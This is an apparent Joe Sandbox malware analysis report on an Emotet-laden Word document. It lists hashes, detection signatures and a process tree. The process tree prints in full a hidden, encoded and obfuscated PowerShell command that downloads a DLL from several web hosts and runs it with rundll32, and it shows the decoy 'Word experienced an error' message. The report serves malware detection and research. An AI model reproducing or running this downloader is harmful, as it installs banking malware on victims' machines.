Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report v22Pc0qA.doc.doc

Overview

General Information

Sample Name:v22Pc0qA.doc.doc
Analysis ID:347028
MD5:7a7d325948481b0557b035249bf5c96a
SHA1:0529727ffad8388fc94155d1652ca65189cda5df
SHA256:47e4926bc53fb131b2e976d7b1c2f4b3c0f665242aa493d7e21b4df773b60919

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 4180 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • cmd.exe (PID: 5632 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJwArACcAMwBzACcAKwAoACgAJwAyACkAJwApACkAKwAoACgAJwAoAGMAYQBpAHIAbwBjACcAKwAnAGEAJwArACcAZAAnACkAKQArACcALgBjACcAKwAoACgAJwBvAG0AJwArACcASgApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACgAYwAnACkAKQArACgAJwBnAGkAJwArACcALQAnACsAJwBiAGkAbgBKACcAKQArACgAKAAnACkAKAAzAHMAMgApACgAJwArACcAMQBQACcAKwAnAEIAJwArACcAQgAnACkAKQArACgAKAAnAEoAKQAoADMAcwAyACkAJwArACcAKAAnACkAKQArACcAQAAnACsAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACsAJwBzACcAKwAoACgAJwA6AEoAKQAoADMAcwAyACcAKwAnACkAKABKACcAKwAnACkAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwB3ACcAKQApACsAKAAnAHcAdwAuACcAKwAnAGkAJwArACcAcwBhAHQAZQBjAGgAbgBvACcAKQArACcAbAAnACsAKAAnAG8AJwArACcAZwB5AC4AJwApACsAKAAoACcAYwBvAG0ASgAnACsAJwApACgAMwBzACcAKwAnADIAKQAnACsAJwAoAHQAJwArACcAcgBhAGkAbgBpAG4AZwAnACsAJwBKACkAKAAnACsAJwAzACcAKQApACsAJwBzADIAJwArACgAKAAnACkAJwArACcAKABiAEoAJwArACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAQABoAHQAJwArACcAdAAnACkAKQArACcAcAAnACsAJwA6ACcAKwAoACgAJwBKACkAJwApACkAKwAnACgAJwArACcAMwAnACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAnACkAJwArACgAKAAnACgAaABvACcAKwAnAHQAZQAnACkAKQArACgAJwBsACcAKwAnAHMAaABpAHYAJwApACsAKAAnAGEAJwArACcAbgBzAGgAJwApACsAKAAoACcALgBjACcAKwAnAG8AbQBKACkAKAAnACkAKQArACcAMwBzACcAKwAoACgAJwAyACkAKABVAHMAJwArACcAZQByAEYAJwArACcAaQAnACkAKQArACgAJwBsACcAKwAnAGUAcwAnACkAKwAnAEoAJwArACgAKAAnACkAKAAnACkAKQArACgAJwAzACcAKwAnAHMAMgAnACkAKwAoACgAJwApACgAJwArACcAOABKACkAJwArACcAKAAzAHMAMgApACcAKQApACsAKAAoACcAKAAnACsAJwBAAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAoADMAcwAyACcAKwAnACkAJwArACcAKAAnACsAJwBKACkAJwArACcAKAAzAHMAMgApACcAKwAnACgAbwB3ACcAKwAnAG4AaQB0AGMAbwAnACkAKQArACgAJwBuAHMAJwArACcAaQAnACsAJwBnAG4AbQBlAG4AdAAuAGMAbwBtACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAnACkAKQArACgAKAAnADIAJwArACcAKQAoACcAKQApACsAKAAnAGYAaQAnACsAJwBsACcAKwAnAGUAcwBKACcAKQArACgAKAAnACkAJwArACcAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwBiAEoAJwApACkAKwAnACkAJwArACgAKAAnACgAMwBzADIAKQAnACsAJwAoACcAKQApACsAKAAnAEAAaAB0AHQAJwArACcAcABzACcAKQArACgAKAAnADoAJwArACcASgAnACsAJwApACgAMwBzADIAKQAoAEoAKQAoADMAJwArACcAcwAyACkAJwApACkAKwAoACgAJwAoAGIAJwArACcAMgAnACkAKQArACgAJwBiACcAKwAnAGMAbwBtAC4AYwAnACsAJwBvACcAKwAnAG0ALgBiACcAKQArACcAcgAnACsAKAAoACcASgAnACsAJwApACgAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAcwBpACcAKQApACsAKAAoACcAdABlAEoAKQAnACsAJwAoADMAJwArACcAcwAnACsAJwAyACkAKAAwAEgASgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAyACkAKABAACcAKwAnAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAnACsAJwAoACcAKwAnADMAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAoACgAJwApACcAKwAnACgAdAAnACsAJwByAGEAbgBzACcAKwAnAGYAZQAnACkAKQArACgAJwByAHMAdQAnACsAJwB2AGEAJwApACsAKAAoACcAbgAnACsAJwAuAGMAbwBtACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAKQAoAHcAcAAtAGEAJwArACcAZAAnACsAJwBtACcAKQApACsAJwBpACcAKwAoACgAJwBuACcAKwAnAEoAKQAoADMAcwAyACcAKwAnACkAKABPACcAKwAnAFYAbAAnACkAKQArACcASgAnACsAKAAoACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAoACcAKQApACsAJwBAACcAKwAnAGgAdAAnACsAKAAnAHQAJwArACcAcABzADoAJwApACsAKAAoACcASgAnACsAJwApACcAKwAnACgAMwBzADIAKQAoAEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAcABoAHkAcwAnACkAKQArACcAaQAnACsAKAAoACcAbwAtACcAKwAnAHMAdgBkAGgALgAnACsAJwBjAGgASgApACgAMwAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwB3AHAALQBhAGQAJwApACkAKwAoACgAJwBtAGkAbgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgAawAnACsAJwBLAEoAKQAoADMAJwApACkAKwAnAHMAJwArACgAKAAnADIAKQAnACkAKQArACcAKAAnACkAKQAuACIAcgBlAFAAbABgAEEAYwBFACIAKAAoACgAJwBKACcAKwAoACgAJwApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAMgApACcAKwAnACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoAHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBTAGAAUABMAEkAVAAiACgAJABUAGcAMwB5AHAAdgAwACAAKwAgACQASAAyAHEANgBxAHAAegAgACsAIAAkAEEAcABqADAAdwBtAG8AKQA7ACQAQwBxAG8AdwBiADQAZAA9ACgAKAAnAFgANgAnACsAJwB1AGgAJwApACsAKAAnADAANQAnACsAJwB5ACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIAHcAcQBmAGUAbwBuACAAaQBuACAAJABOAGsAcQBfAGcAMABxACAAfAAgAFMATwBgAFIAYABUAC0AbwBiAGAASgBFAEMAdAAgAHsARwBlAGAAVAAtAFIAYQBgAE4ARABvAG0AfQApAHsAdAByAHkAewAkAFYAMABfAHIAaQAwAG4ALgAiAGQAbwB3AGAATgBsAE8AYABBAEQAYABGAGkATABlACIAKAAkAEgAdwBxAGYAZQBvAG4ALAAgACQAWgByAHcAagBoADkAawApADsAJABDAHcAawAxAG8AOABvAD0AKAAoACcAQgAnACsAJwA2AHgAMgBvACcAKQArACcAdwB0ACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABaAHIAdwBqAGgAOQBrACkALgAiAEwAZQBuAGcAYABUAGgAIgAgAC0AZwBlACAANAA0ADAANwA3ACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAcgB3AGoAaAA5AGsALAAnACMAMQAnAC4AIgBUAGAAbwBzAHQAYABSAGkAbgBHACIAKAApADsAJABDAGMAcwBrAGkAeAAwAD0AKAAnAFkAJwArACcAMwB2ACcAKwAoACcAYQAyAHQAJwArACcAZwAnACkAKQA7AGIAcgBlAGEAawA7ACQASQA3AGEAYgB6ADYAZwA9ACgAJwBMACcAKwAoACcAdQBoACcAKwAnAGYAbgBxAGsAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFcAXwA2ADIAZgB5ADYAPQAoACcASQAnACsAJwB4AHEAJwArACgAJwBmACcAKwAnADQAOQBsACcAKQApAA== MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • msg.exe (PID: 6068 cmdline: msg user /v Word experienced an error trying to open the file. MD5: EEB395D8DD3C1D6593903BD640687948)
    • powershell.exe (PID: 1320 cmdline: POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJwArACcAMwBzACcAKwAoACgAJwAyACkAJwApACkAKwAoACgAJwAoAGMAYQBpAHIAbwBjACcAKwAnAGEAJwArACcAZAAnACkAKQArACcALgBjACcAKwAoACgAJwBvAG0AJwArACcASgApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACgAYwAnACkAKQArACgAJwBnAGkAJwArACcALQAnACsAJwBiAGkAbgBKACcAKQArACgAKAAnACkAKAAzAHMAMgApACgAJwArACcAMQBQACcAKwAnAEIAJwArACcAQgAnACkAKQArACgAKAAnAEoAKQAoADMAcwAyACkAJwArACcAKAAnACkAKQArACcAQAAnACsAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACsAJwBzACcAKwAoACgAJwA6AEoAKQAoADMAcwAyACcAKwAnACkAKABKACcAKwAnACkAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwB3ACcAKQApACsAKAAnAHcAdwAuACcAKwAnAGkAJwArACcAcwBhAHQAZQBjAGgAbgBvACcAKQArACcAbAAnACsAKAAnAG8AJwArACcAZwB5AC4AJwApACsAKAAoACcAYwBvAG0ASgAnACsAJwApACgAMwBzACcAKwAnADIAKQAnACsAJwAoAHQAJwArACcAcgBhAGkAbgBpAG4AZwAnACsAJwBKACkAKAAnACsAJwAzACcAKQApACsAJwBzADIAJwArACgAKAAnACkAJwArACcAKABiAEoAJwArACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAQABoAHQAJwArACcAdAAnACkAKQArACcAcAAnACsAJwA6ACcAKwAoACgAJwBKACkAJwApACkAKwAnACgAJwArACcAMwAnACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAnACkAJwArACgAKAAnACgAaABvACcAKwAnAHQAZQAnACkAKQArACgAJwBsACcAKwAnAHMAaABpAHYAJwApACsAKAAnAGEAJwArACcAbgBzAGgAJwApACsAKAAoACcALgBjACcAKwAnAG8AbQBKACkAKAAnACkAKQArACcAMwBzACcAKwAoACgAJwAyACkAKABVAHMAJwArACcAZQByAEYAJwArACcAaQAnACkAKQArACgAJwBsACcAKwAnAGUAcwAnACkAKwAnAEoAJwArACgAKAAnACkAKAAnACkAKQArACgAJwAzACcAKwAnAHMAMgAnACkAKwAoACgAJwApACgAJwArACcAOABKACkAJwArACcAKAAzAHMAMgApACcAKQApACsAKAAoACcAKAAnACsAJwBAAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAoADMAcwAyACcAKwAnACkAJwArACcAKAAnACsAJwBKACkAJwArACcAKAAzAHMAMgApACcAKwAnACgAbwB3ACcAKwAnAG4AaQB0AGMAbwAnACkAKQArACgAJwBuAHMAJwArACcAaQAnACsAJwBnAG4AbQBlAG4AdAAuAGMAbwBtACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAnACkAKQArACgAKAAnADIAJwArACcAKQAoACcAKQApACsAKAAnAGYAaQAnACsAJwBsACcAKwAnAGUAcwBKACcAKQArACgAKAAnACkAJwArACcAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwBiAEoAJwApACkAKwAnACkAJwArACgAKAAnACgAMwBzADIAKQAnACsAJwAoACcAKQApACsAKAAnAEAAaAB0AHQAJwArACcAcABzACcAKQArACgAKAAnADoAJwArACcASgAnACsAJwApACgAMwBzADIAKQAoAEoAKQAoADMAJwArACcAcwAyACkAJwApACkAKwAoACgAJwAoAGIAJwArACcAMgAnACkAKQArACgAJwBiACcAKwAnAGMAbwBtAC4AYwAnACsAJwBvACcAKwAnAG0ALgBiACcAKQArACcAcgAnACsAKAAoACcASgAnACsAJwApACgAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAcwBpACcAKQApACsAKAAoACcAdABlAEoAKQAnACsAJwAoADMAJwArACcAcwAnACsAJwAyACkAKAAwAEgASgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAyACkAKABAACcAKwAnAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAnACsAJwAoACcAKwAnADMAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAoACgAJwApACcAKwAnACgAdAAnACsAJwByAGEAbgBzACcAKwAnAGYAZQAnACkAKQArACgAJwByAHMAdQAnACsAJwB2AGEAJwApACsAKAAoACcAbgAnACsAJwAuAGMAbwBtACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAKQAoAHcAcAAtAGEAJwArACcAZAAnACsAJwBtACcAKQApACsAJwBpACcAKwAoACgAJwBuACcAKwAnAEoAKQAoADMAcwAyACcAKwAnACkAKABPACcAKwAnAFYAbAAnACkAKQArACcASgAnACsAKAAoACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAoACcAKQApACsAJwBAACcAKwAnAGgAdAAnACsAKAAnAHQAJwArACcAcABzADoAJwApACsAKAAoACcASgAnACsAJwApACcAKwAnACgAMwBzADIAKQAoAEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAcABoAHkAcwAnACkAKQArACcAaQAnACsAKAAoACcAbwAtACcAKwAnAHMAdgBkAGgALgAnACsAJwBjAGgASgApACgAMwAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwB3AHAALQBhAGQAJwApACkAKwAoACgAJwBtAGkAbgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgAawAnACsAJwBLAEoAKQAoADMAJwApACkAKwAnAHMAJwArACgAKAAnADIAKQAnACkAKQArACcAKAAnACkAKQAuACIAcgBlAFAAbABgAEEAYwBFACIAKAAoACgAJwBKACcAKwAoACgAJwApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAMgApACcAKwAnACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoAHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBTAGAAUABMAEkAVAAiACgAJABUAGcAMwB5AHAAdgAwACAAKwAgACQASAAyAHEANgBxAHAAegAgACsAIAAkAEEAcABqADAAdwBtAG8AKQA7ACQAQwBxAG8AdwBiADQAZAA9ACgAKAAnAFgANgAnACsAJwB1AGgAJwApACsAKAAnADAANQAnACsAJwB5ACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIAHcAcQBmAGUAbwBuACAAaQBuACAAJABOAGsAcQBfAGcAMABxACAAfAAgAFMATwBgAFIAYABUAC0AbwBiAGAASgBFAEMAdAAgAHsARwBlAGAAVAAtAFIAYQBgAE4ARABvAG0AfQApAHsAdAByAHkAewAkAFYAMABfAHIAaQAwAG4ALgAiAGQAbwB3AGAATgBsAE8AYABBAEQAYABGAGkATABlACIAKAAkAEgAdwBxAGYAZQBvAG4ALAAgACQAWgByAHcAagBoADkAawApADsAJABDAHcAawAxAG8AOABvAD0AKAAoACcAQgAnACsAJwA2AHgAMgBvACcAKQArACcAdwB0ACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABaAHIAdwBqAGgAOQBrACkALgAiAEwAZQBuAGcAYABUAGgAIgAgAC0AZwBlACAANAA0ADAANwA3ACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAcgB3AGoAaAA5AGsALAAnACMAMQAnAC4AIgBUAGAAbwBzAHQAYABSAGkAbgBHACIAKAApADsAJABDAGMAcwBrAGkAeAAwAD0AKAAnAFkAJwArACcAMwB2ACcAKwAoACcAYQAyAHQAJwArACcAZwAnACkAKQA7AGIAcgBlAGEA